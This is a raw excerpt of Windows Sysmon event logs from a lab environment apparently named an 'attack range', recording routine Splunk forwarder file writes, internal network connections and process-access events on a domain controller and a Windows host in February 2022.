Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93B616A811ACC31C2FA4A131021D553A,SHA256=F3860DE81C3A5BBB3F2BE41BA0A0AC3D28772204840F558CDC50F249271E63DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289557Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:10.611{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACF5A7939F25583419F05438AAE76D8C,SHA256=847538BD5D89E2110F1C6DE6FFC8A79B012DD1EF64BEE4B67C7270498AE3E65D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289558Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:11.612{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF7C8D1D705F4965D3C233F3D6D93D89,SHA256=C8FDA34B6DEC033718D8F079B99789959B1F19CCBAC80B9A089C6FB7880A55D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217426Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:12.163{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAA48A48EEC522152AFF14F9135E031A,SHA256=EB5FED4EC278AA585B34239066CC619ABFA26B4CEF6196260CDCBDCFDF6B1625,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289559Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:12.613{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3485ECA06CD283C18E880318C1D73FFE,SHA256=0C6C8EE3FECA0B18AB82550991F23494C0C614722C54B3C8981BD16F11C3CB75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217427Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:13.413{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A9CD68BC9BD6832C0E8DE1D838B1387,SHA256=6AF9721E37383DD1B527BB02C1A06153078D2108DEC3A171649C7DB9ED874B30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289560Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:13.628{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C02658788E8F6C7373731DEFAA1AF75B,SHA256=9DD75D7C020516C0EBE6830696764BA69DDCCF5B8F3BA08223557A308E7C9186,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289562Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:14.645{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89FF75245C6828EE910D2AF51C3D3D7E,SHA256=A36C11D8B846176D4CE59CEC915E2C4A1F95E525B68FE72C92C8C9F2A1253D25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217428Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:14.491{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A176E9713F784E9DE06B649BBBC0E9FA,SHA256=3942BC1D324EBD9A0B90E86549E59EBF2127EF5D88C358A43B8A8CE8F8956446,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289561Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:12.589{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53541-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000289563Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:15.676{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EF65A5B84EEABA4C9944167DC3AECE6,SHA256=A9DE8E67DD1A4D37C546D079F4D2E7B2FB3AF4093E68B6783B0351DCCFE19365,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217430Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:15.538{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F003F02D82F32A2E7E4288B2AD6EFBE3,SHA256=AB1BCADC557600A76E1222C2777A70A1BE7173E972E83879B44C9EB5402680F1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217429Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:12.515{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51393-false10.0.1.12-8000- 23542300x8000000000000000289565Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:16.677{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=065493FFD0A766D286D5825C7B4535E2,SHA256=AA64AD410DEA01E787DA1BF890A58DF4B30C7F3FDD1A45764D9A539888C4DF39,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217431Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:16.600{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BA5B39001657EC8D29AC21EF139397C,SHA256=4320CDF93CC6114894240B7348AD9C4DD78425B558DB1A5CC94EC6A3D21403E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289564Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:16.545{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=4D3A487FA089415D0B8D82D039EE825F,SHA256=C8C1ADABA57AE942DE85E513B39DCDBCAA3B61D917C0014D8CAC445306B5E460,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217432Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:17.678{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=523A83681AFC0BBF83AE9838ED922009,SHA256=B80C699B82963986E843FC84F7CAE0276A8170C1FD004182922AB0A25A7A4F00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289566Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:17.696{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A01E21D243A2A47E0E83A539393C7DE,SHA256=E569DCA3B84D8F575DEE323450F8ACA0A189A2C266EB6D3A55A87E71675ED236,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217433Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:18.693{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E7EC76455A58DEC3EB0AF9AD61C2E1D,SHA256=8D0F23E855E686D0B403BF7D0B9EF8E3C3CD65AE441821804CA67125C585C948,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289567Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:18.713{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFE47B994E90712F7718B5DDC7058817,SHA256=B97F13B39764A2FBDBB4DB8737F829A052A8DBDAA2C78DC951D29B393A93794A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217435Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:19.709{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0FFD5FC4B1D41B24633E37D1EAF4C5C,SHA256=DA4D43CAEEB324169CC17E5CB5F9E339C5090DA74CA855809EC9D17FEEFF8DDF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289586Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:19.948{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1297-6216-3E05-000000003802}6536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289585Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:19.948{C8EA50B7-1297-6216-3D05-000000003802}65326528C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289584Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:19.916{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289583Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:19.916{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1297-6216-3E05-000000003802}6536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000289582Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:19.916{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289581Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:19.916{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289580Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:19.916{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289579Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:19.916{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1297-6216-3E05-000000003802}6536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000289578Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:19.904{C8EA50B7-1297-6216-3E05-000000003802}6536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000289577Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:19.732{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C135DD56E907E5E28631D0F9AD6F280C,SHA256=CC49AD00ABE89691694093C56558BB644BF8A5A0DED39C3E85D43069CBCA080D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217434Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:17.639{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51394-false10.0.1.12-8000- 354300x8000000000000000289576Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:17.588{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53542-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000289575Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:19.397{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1297-6216-3D05-000000003802}6532C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289574Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:19.397{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289573Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:19.397{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289572Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:19.396{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289571Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:19.396{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289570Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:19.395{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-1297-6216-3D05-000000003802}6532C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000289569Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:19.394{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program 